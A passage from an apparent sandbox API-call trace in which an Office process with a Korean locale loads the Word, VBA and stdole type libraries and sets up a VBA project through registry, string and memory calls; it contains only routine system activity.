phkResult=0x33e4fb3438*=0x120a) returned 0x0 [0059.074] RegEnumKeyW (in: hKey=0x120a, dwIndex=0x0, lpName=0x33e4fb3468, cchName=0xa | out: lpName="8.7") returned 0x0 [0059.074] wcscpy_s (in: _Destination=0x33e4fb3450, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0059.074] RegOpenKeyW (in: hKey=0x120a, lpSubKey="8.7", phkResult=0x33e4fb34f8 | out: phkResult=0x33e4fb34f8*=0x120e) returned 0x0 [0059.074] _ultoa_s (in: _Val=0x409, _DstBuf=0x33e4fb3470, _Size=0xa, _Radix=16 | out: _DstBuf="409") returned 0x0 [0059.074] RegOpenKeyA (in: hKey=0x120e, lpSubKey="409", phkResult=0x33e4fb3460 | out: phkResult=0x33e4fb3460*=0x0) returned 0x2 [0059.074] _ultoa_s (in: _Val=0x9, _DstBuf=0x33e4fb3470, _Size=0xa, _Radix=16 | out: _DstBuf="9") returned 0x0 [0059.074] RegOpenKeyA (in: hKey=0x120e, lpSubKey="9", phkResult=0x33e4fb3460 | out: phkResult=0x33e4fb3460*=0x0) returned 0x2 [0059.074] RegOpenKeyA (in: hKey=0x120e, lpSubKey="0", phkResult=0x33e4fb3460 | out: phkResult=0x33e4fb3460*=0x121a) returned 0x0 [0059.075] RegOpenKeyW (in: hKey=0x121a, lpSubKey="win64", phkResult=0x33e4fb3468 | out: phkResult=0x33e4fb3468*=0x1222) returned 0x0 [0059.075] RegCloseKey (hKey=0x1222) returned 0x0 [0059.075] RegCloseKey (hKey=0x121a) returned 0x0 [0059.075] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb3500, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0059.075] RegOpenKeyW (in: hKey=0x120e, lpSubKey="0", phkResult=0x33e4fb34d8 | out: phkResult=0x33e4fb34d8*=0x1216) returned 0x0 [0059.075] RegQueryValueW (in: hKey=0x1216, lpSubKey="win64", lpData=0x33e4fb3520, lpcbData=0x33e4fb34d4 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x33e4fb34d4) returned 0x0 [0059.075] wcscpy_s (in: _Destination=0x33e4fb3850, _SizeInWords=0x800, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0059.075] RegCloseKey (hKey=0x1216) returned 0x0 [0059.075] RegCloseKey (hKey=0x120e) returned 0x0 [0059.075] RegCloseKey (hKey=0x120a) returned 0x0 [0059.076] RegCloseKey (hKey=0x11f6) returned 0x0 [0059.076] LoadTypeLib (in: szFile="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", pptlib=0x33e4fb26d8*=0x0 | out: pptlib=0x33e4fb26d8*=0x1d3985c4c00) returned 0x0 [0059.076] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c4c00, index=-1, refPtrFlags=0xe4fb26f8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb27a8 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb27a8) returned 0x0 [0059.076] IUnknown:QueryInterface (in: This=0x1d3985c4c00, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb24e8 | out: ppvObject=0x33e4fb24e8*=0x0) returned 0x80004002 [0059.076] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c4c00, ppTLibAttr=0x33e4fb24e0, pDummy=0x33e4fb24e8 | out: ppTLibAttr=0x33e4fb24e0, pDummy=0x33e4fb24e8*=0x0) returned 0x0 [0059.076] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c4c00, index=-1, refPtrFlags=0x0, pBstrName=0x33e4fb24d8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x33e4fb24d8*="Microsoft Word 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0059.076] StringFromGUID2 (in: rguid=0x1d398543190*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x33e4fb2500, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0059.076] _ultow_s (in: _Value=0x8, _Buffer=0x33e4fb244a, _BufferCount=0x10, _Radix=16 | out: _Buffer="8") returned 0x0 [0059.076] _ultow_s (in: _Value=0x7, _Buffer=0x33e4fb244e, _BufferCount=0xe, _Radix=16 | out: _Buffer="7") returned 0x0 [0059.076] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb2452, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0059.077] wcscpy_s (in: _Destination=0x1d39d9ec5d8, _SizeInWords=0x8e, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0059.077] wcscpy_s (in: _Destination=0x1d39d9ec5de, _SizeInWords=0x8b, _Source="{00020905-0000-0000-C000-000000000046}" | out: _Destination="{00020905-0000-0000-C000-000000000046}") returned 0x0 [0059.077] wcscpy_s (in: _Destination=0x1d39d9ec62a, _SizeInWords=0x65, _Source="#8.7#0#" | out: _Destination="#8.7#0#") returned 0x0 [0059.077] wcscpy_s (in: _Destination=0x1d39d9ec638, _SizeInWords=0x5e, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0059.077] wcscpy_s (in: _Destination=0x1d39d9ec6ae, _SizeInWords=0x23, _Source="Microsoft Word 16.0 Object Library" | out: _Destination="Microsoft Word 16.0 Object Library") returned 0x0 [0059.077] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c4c00) returned 0x0 [0059.077] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d83d900, cb=0x1a0) returned 0x1d39d59f210 [0059.077] wcscpy_s (in: _Destination=0x1d39d59f210, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0059.077] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c4c00, index=-1, refPtrFlags=0xe4fb25f8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d39d61c01c | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d39d61c01c) returned 0x0 [0059.078] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Word") returned 0x506bb5 [0059.078] strcpy_s (in: _Dst=0x33e4fb23f0, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0059.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb23f0, cbMultiByte=5, lpWideCharStr=0x33e4fb2240, cchWideChar=5 | out: lpWideCharStr="Word") returned 5 [0059.078] wcsncpy_s (in: _Destination=0x33e4fb21f0, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0059.078] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0059.078] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x11c) returned 0x1d39d5efea0 [0059.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x1d39d5efea0, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0059.078] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d5efea0) [0059.078] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0059.078] wcsncpy_s (in: _Destination=0x33e4fb21f0, _SizeInWords=0x108, _Source="*\\Z0261d40718", _MaxCount=0x106 | out: _Destination="*\\Z0261d40718") returned 0x0 [0059.078] CharLowerBuffW (in: lpsz="*\\Z0261d40718", cchLength=0xd | out: lpsz="*\\z0261d40718") returned 0xd [0059.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0261d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb2120, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0261d40718", lpUsedDefaultChar=0x0) returned 14 [0059.078] _wcsicmp (_String1="*\\Z0261d40718", _String2="*\\Z0261d40718") returned 0 [0059.078] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x6 [0059.078] IUnknown:QueryInterface (in: This=0x1d3985c4c00, riid=0x7ffce0bccce8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb2618 | out: ppvObject=0x33e4fb2618*=0x0) returned 0x80004002 [0059.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x33e4fb25e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0059.078] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Word") returned 0x506bb5 [0059.078] IUnknown:Release (This=0x1d3985c4c00) returned 0x5 [0059.078] IUnknown:AddRef (This=0x1d3980663b0) returned 0x3 [0059.078] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980663b0, index=-1, refPtrFlags=0xe4fb26f8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3300000000 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3300000000) returned 0x0 [0059.078] IUnknown:QueryInterface (in: This=0x1d3980663b0, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb24e8 | out: ppvObject=0x33e4fb24e8*=0x0) returned 0x80004002 [0059.078] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb24e0, pDummy=0x33e4fb24e8 | out: ppTLibAttr=0x33e4fb24e0, pDummy=0x33e4fb24e8*=0x0) returned 0x0 [0059.078] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980663b0, index=-1, refPtrFlags=0x0, pBstrName=0x33e4fb24d8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xd9f7c7bf2dc4 | out: pBstrName=0x33e4fb24d8*="Visual Basic For Applications", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xd9f7c7bf2dc4) returned 0x0 [0059.078] StringFromGUID2 (in: rguid=0x1d398543190*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x33e4fb2500, cchMax=39 | out: lpsz="{000204EF-0000-0000-C000-000000000046}") returned 39 [0059.078] _ultow_s (in: _Value=0x4, _Buffer=0x33e4fb244a, _BufferCount=0x10, _Radix=16 | out: _Buffer="4") returned 0x0 [0059.079] _ultow_s (in: _Value=0x2, _Buffer=0x33e4fb244e, _BufferCount=0xe, _Radix=16 | out: _Buffer="2") returned 0x0 [0059.079] _ultow_s (in: _Value=0x9, _Buffer=0x33e4fb2452, _BufferCount=0xc, _Radix=16 | out: _Buffer="9") returned 0x0 [0059.079] wcscpy_s (in: _Destination=0x1d39d9ec5d8, _SizeInWords=0x91, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0059.079] wcscpy_s (in: _Destination=0x1d39d9ec5de, _SizeInWords=0x8e, _Source="{000204EF-0000-0000-C000-000000000046}" | out: _Destination="{000204EF-0000-0000-C000-000000000046}") returned 0x0 [0059.079] wcscpy_s (in: _Destination=0x1d39d9ec62a, _SizeInWords=0x68, _Source="#4.2#9#" | out: _Destination="#4.2#9#") returned 0x0 [0059.079] wcscpy_s (in: _Destination=0x1d39d9ec638, _SizeInWords=0x61, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0059.079] wcscpy_s (in: _Destination=0x1d39d9ec6be, _SizeInWords=0x1e, _Source="Visual Basic For Applications" | out: _Destination="Visual Basic For Applications") returned 0x0 [0059.079] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0059.079] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d59f210, cb=0x340) returned 0x1d39d9d4b80 [0059.079] wcscpy_s (in: _Destination=0x1d39d9d4cc8, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0059.079] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980663b0, index=-1, refPtrFlags=0xe4fb25f8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d39d9e35dc | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d39d9e35dc) returned 0x0 [0059.079] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VBA") returned 0x50e2f7 [0059.079] strcpy_s (in: _Dst=0x33e4fb23f0, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0059.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb23f0, cbMultiByte=4, lpWideCharStr=0x33e4fb2240, cchWideChar=4 | out: lpWideCharStr="VBA") returned 4 [0059.079] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x6 [0059.079] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="VBA", lHashVal=0x50e2f7, pfName=0x33e4fb2310, pBstrLibName=0x33e4fb2240 | out: pfName=0x33e4fb2310*=0, pBstrLibName=0x33e4fb2240) returned 0x0 [0059.079] IUnknown:Release (This=0x1d3985c4c00) returned 0x5 [0059.079] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xc) returned 0x1d39d86f4e0 [0059.079] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982154c0) [0059.079] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d3982157c0 [0059.079] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d86f4e0) [0059.079] wcsncpy_s (in: _Destination=0x33e4fb21f0, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0059.079] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0059.079] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x122) returned 0x1d39d5f1c50 [0059.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x1d39d5f1c50, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0059.079] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d5f1c50) [0059.079] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0059.080] wcsncpy_s (in: _Destination=0x33e4fb21f0, _SizeInWords=0x108, _Source="*\\Z0261d40718", _MaxCount=0x106 | out: _Destination="*\\Z0261d40718") returned 0x0 [0059.080] CharLowerBuffW (in: lpsz="*\\Z0261d40718", cchLength=0xd | out: lpsz="*\\z0261d40718") returned 0xd [0059.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0261d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb2120, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0261d40718", lpUsedDefaultChar=0x0) returned 14 [0059.080] _wcsicmp (_String1="*\\Z0261d40718", _String2="*\\Z0261d40718") returned 0 [0059.080] IUnknown:AddRef (This=0x1d3980663b0) returned 0x4 [0059.080] IUnknown:QueryInterface (in: This=0x1d3980663b0, riid=0x7ffce0bccce8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb2618 | out: ppvObject=0x33e4fb2618*=0x0) returned 0x80004002 [0059.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x33e4fb25e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0059.080] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VBA") returned 0x50e2f7 [0059.080] IUnknown:Release (This=0x1d3980663b0) returned 0x3 [0059.080] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a7f10 [0059.080] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d4a7f10) returned 0x0 [0059.080] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a7da0 [0059.080] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d4a7da0) returned 0x0 [0059.080] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a7d10 [0059.080] qsort (in: _Base=0x1d39d4a7d10, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7ffce0b61bbc | out: _Base=0x1d39d4a7d10) [0059.080] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a7d10) [0059.080] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x18) returned 0x1d39d86f4e0 [0059.080] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xc) returned 0x1d39d86fa60 [0059.080] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d86fa60) returned 0xc [0059.080] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Win16") returned 0x507ec1 [0059.080] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Win32") returned 0x507f07 [0059.080] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Win64") returned 0x507f78 [0059.080] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Mac") returned 0x50b2b3 [0059.080] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VBA6") returned 0x5023ad [0059.080] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VBA7") returned 0x5023ae [0059.080] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a7da0) [0059.080] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a7f10) [0059.080] CoCreateGuid (in: pguid=0x33e4fb48b8 | out: pguid=0x33e4fb48b8*(Data1=0xa2c0a67a, Data2=0xe451, Data3=0x43eb, Data4=([0]=0xb4, [1]=0x68, [2]=0x4, [3]=0x87, [4]=0xbb, [5]=0x99, [6]=0x51, [7]=0x77))) returned 0x0 [0059.081] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x6b0) returned 0x1d39d8f91e0 [0059.081] CoCreateGuid (in: pguid=0x1d39d8b1d48 | out: pguid=0x1d39d8b1d48*(Data1=0x9ab25fc0, Data2=0x2df6, Data3=0x4962, Data4=([0]=0xb9, [1]=0x65, [2]=0x4, [3]=0x12, [4]=0xaa, [5]=0xe8, [6]=0x33, [7]=0xb5))) returned 0x0 [0059.081] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x0) returned 0x1d39d4a7f40 [0059.081] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39d5f6e30 [0059.081] strcpy_s (in: _Dst=0x1d39d8b1da8, _DstSize=0x1, _Src="" | out: _Dst="") returned 0x0 [0059.081] LoadStringA (in: hInstance=0x1d39bed0000, uID=0x32f3, lpBuffer=0x1d39bde9678, cchBufferMax=2043 | out: lpBuffer="????") returned 0x4 [0059.082] wsprintfA (in: param_1=0x1d39bde967c, param_2="%d" | out: param_1="1") returned 1 [0059.082] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0059.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398218cd8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.082] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0059.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398218cd8, cbMultiByte=8, lpWideCharStr=0x1d398543198, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0059.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x33e4fb4d30, cbMultiByte=2044, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0059.082] lstrlenA (lpString="Project") returned 7 [0059.082] CompareStringA (Locale=0x412, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="????1", cchCount2=-1) returned 3 [0059.082] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="????1") returned 0x505be9 [0059.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="????1", cchWideChar=6, lpMultiByteStr=0x33e4fb52a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="????1", lpUsedDefaultChar=0x0) returned 6 [0059.082] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="????1") returned 0x505be9 [0059.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="????1", cchWideChar=6, lpMultiByteStr=0x33e4fb5160, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="????1", lpUsedDefaultChar=0x0) returned 6 [0059.082] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="????1") returned 0x505be9 [0059.082] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="????1") returned 0x505be9 [0059.082] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x18) returned 0x1d39d8706a0 [0059.082] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982157c0) [0059.082] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d398215010 [0059.082] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d398215010, cb=0x44) returned 0x1d39d7b3cf0 [0059.083] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8706a0) [0059.083] wcsncpy_s (in: _Destination=0x33e4fb4f60, _SizeInWords=0x108, _Source="*\\Z0261d40718", _MaxCount=0x106 | out: _Destination="*\\Z0261d40718") returned 0x0 [0059.083] CharLowerBuffW (in: lpsz="*\\Z0261d40718", cchLength=0xd | out: lpsz="*\\z0261d40718") returned 0xd [0059.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0261d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb4e90, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0261d40718", lpUsedDefaultChar=0x0) returned 14 [0059.083] _wcsicmp (_String1="*\\Z0261d40718", _String2="*\\Z0261d40718") returned 0 [0059.083] strcpy_s (in: _Dst=0x1d39d8b1db8, _DstSize=0x6, _Src="????1" | out: _Dst="????1") returned 0x0 [0059.083] SysStringByteLen (bstr="㼿㼿1") returned 0x5 [0059.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398218cd8, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0059.083] SysStringByteLen (bstr="㼿㼿1") returned 0x5 [0059.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398218cd8, cbMultiByte=6, lpWideCharStr=0x1d398543198, cchWideChar=6 | out: lpWideCharStr="????1") returned 6 [0059.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="????1", cchWideChar=-1, lpMultiByteStr=0x33e4fb4c40, cbMultiByte=2043, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="????1", lpUsedDefaultChar=0x0) returned 6 [0059.083] lstrlenA (lpString="????1") returned 5 [0059.084] QueryPathOfRegTypeLib (in: guid=0x7ffce0bdd268*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), wMaj=0x2, wMin=0x0, lcid=0x0, lpbstrPathName=0x33e4fb5108 | out: lpbstrPathName=0x33e4fb5108) returned 0x0 [0059.085] lstrlenA (lpString="C:\\Windows\\System32\\stdole2.tlb") returned 31 [0059.085] malloc (_Size=0x20) returned 0x1d39bde6b10 [0059.085] malloc (_Size=0x20) returned 0x1d39bde6c30 [0059.085] lstrcpyA (in: lpString1=0x1d39bde6b10, lpString2="C:\\Windows\\System32\\stdole2.tlb" | out: lpString1="C:\\Windows\\System32\\stdole2.tlb") returned="C:\\Windows\\System32\\stdole2.tlb" [0059.085] _access_s (_FileName="C:\\Windows\\System32\\stdole2.tlb", _AccessMode=0) returned 0x0 [0059.085] LoadTypeLib (in: szFile="C:\\Windows\\System32\\stdole2.tlb", 